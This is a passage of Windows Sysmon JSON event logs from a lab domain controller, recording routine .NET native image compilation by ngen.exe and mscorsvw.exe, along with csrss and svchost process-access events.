05:58:13.495","ProcessGuid":"{A837DB8D-0465-5F25-0000-001005700C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10f8-0\\PresentationFramework.dll","CreationUtcTime":"2020-08-01 05:58:13.495","EventReceivedTime":"2020-08-01 05:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6589,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:13.839\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0475-5F25-0000-0010107A0C00}\r\nTargetProcessId: 3524\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:13.839","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0475-5F25-0000-0010107A0C00}","TargetProcessId":"3524","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6590,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:13.839\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0475-5F25-0000-0010107A0C00}\r\nTargetProcessId: 3524\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:13.839","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0475-5F25-0000-0010107A0C00}","TargetProcessId":"3524","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6591,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:13.839\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0475-5F25-0000-0010107A0C00}\r\nTargetProcessId: 3524\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:13.839","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0475-5F25-0000-0010107A0C00}","TargetProcessId":"3524","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6592,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:13.886\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0475-5F25-0000-0010B57D0C00}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:13.886","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0475-5F25-0000-0010B57D0C00}","TargetProcessId":"872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6593,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:13.886\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0475-5F25-0000-0010B57D0C00}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:13.886","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0475-5F25-0000-0010B57D0C00}","TargetProcessId":"872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6594,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:13.901\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0475-5F25-0000-0010B57D0C00}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:13.901","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0475-5F25-0000-0010B57D0C00}","TargetProcessId":"872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6595,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:14.355\r\nProcessGuid: {A837DB8D-0475-5F25-0000-0010B57D0C00}\r\nProcessId: 872\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\368-0\\PresentationFramework.Aero2.dll\r\nCreationUtcTime: 2020-08-01 05:58:14.355","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:14.355","ProcessGuid":"{A837DB8D-0475-5F25-0000-0010B57D0C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\368-0\\PresentationFramework.Aero2.dll","CreationUtcTime":"2020-08-01 05:58:14.355","EventReceivedTime":"2020-08-01 05:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6596,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:14.386\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0476-5F25-0000-0010A9820C00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:14.386","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0476-5F25-0000-0010A9820C00}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
